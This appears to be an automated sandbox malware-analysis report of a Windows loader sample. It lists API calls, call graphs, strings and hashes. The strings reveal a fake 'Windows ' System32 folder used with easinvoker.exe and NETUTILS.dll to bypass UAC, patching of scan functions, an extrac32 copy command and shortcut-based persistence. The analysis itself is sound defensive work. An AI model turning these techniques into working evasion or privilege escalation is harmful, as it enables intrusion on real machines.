                                                                                                                             • Rendered graph omitted (legend: Executed / Not Executed). Function entry block 28a5a90; blocks in the graph call GetModuleFileNameA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, lstrcpyn, GetThreadLocale, GetLocaleInfoA, lstrlen and LoadLibraryExA.
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 028A5AAC
                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028A5ACA
                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028A5AE8
                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 028A5B06
                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,028A5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 028A5B4F
                                                                                                                            • RegQueryValueExA.ADVAPI32(?,028A5CFC,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,028A5B95,?,80000001), ref: 028A5B6D
                                                                                                                            • RegCloseKey.ADVAPI32(?,028A5B9C,00000000,00000000,00000005,00000000,028A5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028A5B8F
                                                                                                                            • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 028A5BAC
                                                                                                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 028A5BB9
                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 028A5BBF
                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 028A5BEA
                                                                                                                            • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 028A5C31
                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 028A5C41
                                                                                                                            • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 028A5C69
                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 028A5C79
                                                                                                                            • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 028A5C9F
                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 028A5CAF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                            • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                            • API String ID: 1759228003-3917250287
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(bcrypt,028B9A30,Initialize,02904360,028B9A30,UacScan,02904360,028B9A30,UacInitialize,02904360,028B9A30,0290438C,029043DC,ScanString,02904360,028B9A30), ref: 028B7AD2
                                                                                                                            • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028B7ADF
                                                                                                                            • NtWriteVirtualMemory.NTDLL(02904388,00000000,?,00000001,?), ref: 028B7AF6
                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,028B9A30,Initialize,02904360,028B9A30,UacScan,02904360,028B9A30,UacInitialize,02904360,028B9A30,0290438C,029043DC), ref: 028B7B05
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                            • String ID: BCryptVerifySignature$bcrypt
                                                                                                                            • API String ID: 1002360270-4067648912
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028B7975
                                                                                                                            • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028B797B
                                                                                                                            • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028B799B
                                                                                                                            Strings
                                                                                                                            • NtAllocateVirtualMemory, xrefs: 028B796B
                                                                                                                            • C:\Windows\System32\ntdll.dll, xrefs: 028B7970
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                            • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                            • API String ID: 421316089-2206134580
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028B7975
                                                                                                                            • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028B797B
                                                                                                                            • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028B799B
                                                                                                                            Strings
                                                                                                                            • NtAllocateVirtualMemory, xrefs: 028B796B
                                                                                                                            • C:\Windows\System32\ntdll.dll, xrefs: 028B7970
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                            • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                            • API String ID: 421316089-2206134580
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 028BC517
                                                                                                                            • NtClose.NTDLL(?), ref: 028BC591
                                                                                                                              • Part of subcall function 028A4C24: SysFreeString.OLEAUT32(?), ref: 028A4C32
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$CloseFreeNameName_String
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 11680810-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

call 28b7be8 call 28a3694 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 6616->6763 7568 28c47d5-28c4ef6 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a3694 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a2f08 call 28a794c call 28a47b0 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a2f08 call 28a794c call 28a47b0 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a36c4 6633->7568 7569 28c4577-28c47d0 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 
28a4964 call 28a4d38 call 28a4da4 call 28a4728 call 28bc3f8 6633->7569 6938 28c6b54-28c6cd7 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a48b0 6762->6938 6939 28c6395-28c69b4 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a2ee0 call 28a2f08 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 GetCurrentProcess call 28b7968 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 6762->6939 7504 28c5cba-28c5f98 call 28b5aa8 call 28a4b90 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a49bc RtlMoveMemory call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 
28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28ba1c0 call 28a36c4 6763->7504 7505 28c5cb5-28c5cb8 6763->7505 7120 28c6cdd-28c6cec call 28a48b0 6938->7120 7121 28c74a8-28c8b96 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 
call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 * 16 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 
28a47b0 call 28a4964 call 28a4698 call 28b7be8 ExitProcess 6938->7121 7860 28c69bb-28c6b4f call 28a49bc call 28bc5bc call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 EnumSystemLocalesA 6939->7860 7861 28c69b6-28c69b9 6939->7861 7120->7121 7137 28c6cf2-28c6fc5 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28bd198 call 28a4824 call 28a4964 call 28a4698 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a7e18 7120->7137 7538 28c6fcb-28c729d call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28bc74c call 28a44f4 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4da4 * 2 call 28a4728 call 28bc3f8 7137->7538 7539 28c72a2-28c74a3 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a49bc call 28b7f48 7137->7539 
7505->7504 7538->7539 7539->7121 7569->7568 7860->6938 7861->7860
APIs
  • Part of subcall function 028B7BE8: LoadLibraryW.KERNEL32(?,00000000,028B7C9A,?), ref: 028B7C18
  • Part of subcall function 028B7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
  • Part of subcall function 028B7BE8: GetProcAddress.KERNEL32(0290434C,00000000), ref: 028B7C37
  • Part of subcall function 028BC3F8: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 028BC437
  • Part of subcall function 028BC3F8: NtCreateFile.NTDLL(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000), ref: 028BC471
  • Part of subcall function 028BC3F8: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 028BC49E
  • Part of subcall function 028BC3F8: NtClose.NTDLL(?), ref: 028BC4A7
• Sleep.KERNEL32(00001770,UacScan,02900BA8,028C8FEC,ScanString,02900BA8,028C8FEC,OpenSession,02900BA8,028C8FEC,ScanBuffer,02900BA8,028C8FEC,OpenSession,02900BA8,028C8FEC), ref: 028C3094
  • Part of subcall function 028BC368: RtlInitUnicodeString.NTDLL(?,?), ref: 028BC390
  • Part of subcall function 028BC368: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 028BC3A6
  • Part of subcall function 028BC368: NtDeleteFile.NTDLL(?), ref: 028BC3C5
• WinExec.KERNEL32(00000000,028C953C), ref: 028C436D
Strings
Memory Dump Source
• Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
Yara matches
Similarity
• API ID: Path$File$NameName_$AddressCloseCreateDeleteExecHandleInitLibraryLoadModuleProcSleepStringUnicodeWrite
• String ID: .url$C:\Users\Public\$C:\Users\Public\alpha.exe$C:\Windows \System32\NETUTILS.dll$C:\Windows \System32\aaa.bat$C:\Windows \System32\easinvoker.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CO.bat$HotKey=$IconIndex=$Initialize$O.bat$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$[InternetShortcut]$er.e$s.d
• API String ID: 1793215137-2603961859
• Opcode ID: 5ead63ff801801121476e0dddeb9845168b4256f0d1822bbca8d4746cf5df041
• Instruction ID: bd7b063ff216a8bcbd7e5ead88f203ef37fae1faeb22c7fb8f85f544eee35fda
• Opcode Fuzzy Hash: 5ead63ff801801121476e0dddeb9845168b4256f0d1822bbca8d4746cf5df041
• Instruction Fuzzy Hash: 71530C3DA501589FEF51EB68D890EADB3B6BF85700F2044E5A009E7614DFB0AE85CF52
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
APIs
  • Part of subcall function 028B7BE8: LoadLibraryW.KERNEL32(?,00000000,028B7C9A,?), ref: 028B7C18
  • Part of subcall function 028B7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
  • Part of subcall function 028B7BE8: GetProcAddress.KERNEL32(0290434C,00000000), ref: 028B7C37
  • Part of subcall function 028BD318: RegOpenKeyA.ADVAPI32(?,00000000,02904798), ref: 028BD35C
  • Part of subcall function 028BD318: RegSetValueExA.ADVAPI32(02904798,00000000,00000000,00000001,00000000,0290479C,?,00000000,02904798,00000000,028BD3C7), ref: 028BD394
  • Part of subcall function 028BD318: RegCloseKey.ADVAPI32(02904798,02904798,00000000,00000000,00000001,00000000,0290479C,?,00000000,02904798,00000000,028BD3C7), ref: 028BD39F
• WinExec.KERNEL32(00000000,00000000), ref: 028C57F9
  • Part of subcall function 028B9E70: CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000), ref: 028B9F33
• RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 028C5D7B
Strings
Memory Dump Source
• Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
Yara matches
Similarity
• API ID: AddressCloseCompareExecHandleLibraryLoadMemoryModuleMoveOpenProcStringValue
• String ID: C:\Users\Public\$C:\Windows\System32\$Initialize$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
• API String ID: 897696978-872072817
• Opcode ID: 331da04d179b9290a68003559e3011f5a7a20046f7f6c456a7a690c75e06f7e7
• Instruction ID: a9e2093cd476efcb10323525bee74ec9ed9aa622398ea1e5ad2deb1f3de7d291
                                                                                                                            • Opcode Fuzzy Hash: 331da04d179b9290a68003559e3011f5a7a20046f7f6c456a7a690c75e06f7e7
                                                                                                                            • Instruction Fuzzy Hash: 63920B3DA501589FEF11EB68D8A0ADDB3B6BF85700F2084A5A149E7714DFB0AE85CF41
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(00000000), ref: 028A17D0
                                                                                                                            • Sleep.KERNEL32(0000000A,00000000), ref: 028A17E6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3472027048-0
                                                                                                                            • Opcode ID: 889f1f8079c9fb08bc9dcc9c5f16a33ff21abeec0c84488f27a849acf8aa42c3
                                                                                                                            • Instruction ID: 8b9bb7bfef76ab0150991103df70051167eff63a486319264ac4ccb4fc24b529
                                                                                                                            • Opcode Fuzzy Hash: 889f1f8079c9fb08bc9dcc9c5f16a33ff21abeec0c84488f27a849acf8aa42c3
                                                                                                                            • Instruction Fuzzy Hash: F1B1227EA052548FE715CF2CD4E8365BBE1EB84364F0886ADD44DCB389CB70A451CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,028B7BA5,?,?,00000000,00000000), ref: 028B7B61
                                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32), ref: 028B7B67
                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,028B7BA5,?,?,00000000,00000000), ref: 028B7B81
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                            • String ID: irtualProtect$kernel32
                                                                                                                            • API String ID: 2099061454-2063912171
                                                                                                                            • Opcode ID: 2baccda0e96d6dae7153bf56e35cef52e2051e7db84d832db1dc5e3121e286aa
                                                                                                                            • Instruction ID: 2e1f6c07f506ef70b176d93c81ae1520bf1dd61d9f50b18dfc6974b4492d8498
                                                                                                                            • Opcode Fuzzy Hash: 2baccda0e96d6dae7153bf56e35cef52e2051e7db84d832db1dc5e3121e286aa
                                                                                                                            • Instruction Fuzzy Hash: 5A01717D600348AFEB01EFA8DC51EAAB7EDEF88710F514464B514E3780DA74AA108E25
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(00000000), ref: 028A1B17
                                                                                                                            • Sleep.KERNEL32(0000000A,00000000), ref: 028A1B31
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3472027048-0
                                                                                                                            • Opcode ID: 5af09326c51253fa23d2eb422537ff63cc5504c8debbf566f3c7213c590a3fef
                                                                                                                            • Instruction ID: cbbc997c5bb6e4d7bbd36d6f8ec3f9ce2610470df302e8408896ddf2cc1aa655
                                                                                                                            • Opcode Fuzzy Hash: 5af09326c51253fa23d2eb422537ff63cc5504c8debbf566f3c7213c590a3fef
                                                                                                                            • Instruction Fuzzy Hash: 2051F17D6062408FF715CF6CC9E8766BBD4AB45314F1881AED44CCB286EB70D446CB92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(?,00000000,028B7C9A,?), ref: 028B7C18
                                                                                                                            • GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
                                                                                                                            • GetProcAddress.KERNEL32(0290434C,00000000), ref: 028B7C37
                                                                                                                              • Part of subcall function 028B7B20: GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,028B7BA5,?,?,00000000,00000000), ref: 028B7B61
                                                                                                                              • Part of subcall function 028B7B20: GetProcAddress.KERNEL32(00000000,kernel32), ref: 028B7B67
